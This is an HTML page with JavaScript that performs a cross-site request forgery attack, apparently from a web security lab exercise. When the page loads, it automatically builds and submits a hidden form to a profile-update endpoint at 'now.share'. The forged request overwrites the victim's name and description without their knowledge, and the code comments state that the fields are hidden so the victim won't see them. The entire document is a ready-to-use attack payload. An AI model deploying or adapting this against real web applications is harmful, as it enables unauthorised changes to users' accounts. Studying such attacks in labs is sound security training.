<html>
  <body>
    <h1>  This page forges an HTTP POST request.  </h1>

    <script type="text/javascript">
    function post(url,fields)
    {
        //create a <form> element.
        var p = document.createElement("form");
        //construct the form
        p.action = url;
        p.innerHTML = fields;
        p.target = "_self";
        p.method = "post";
        //append the form to the current page.
        document.body.appendChild(p);
        //submit the form
        p.submit();
    }
    function csrf_hack()
    {
        var fields;
        // The following are form entries that need to be filled out
        // by attackers. The entries are made hidden, so the victim
        // won’t be able to see them.
        fields += "<input type='hidden' name='full_name' value='Charlie Miller'>";
        fields += "<input type='hidden' name='description' value='n00bs g3t pwn3d'>";
        //fields += "<input type='button' value='http://now.share/update_settings'>";
        var url = "http://now.share/update_profile";
        post(url,fields);
    }
    // invoke csrf_hack() after the page is loaded.
    window.onload = function() { csrf_hack();}
    </script>
  </body>
</html>
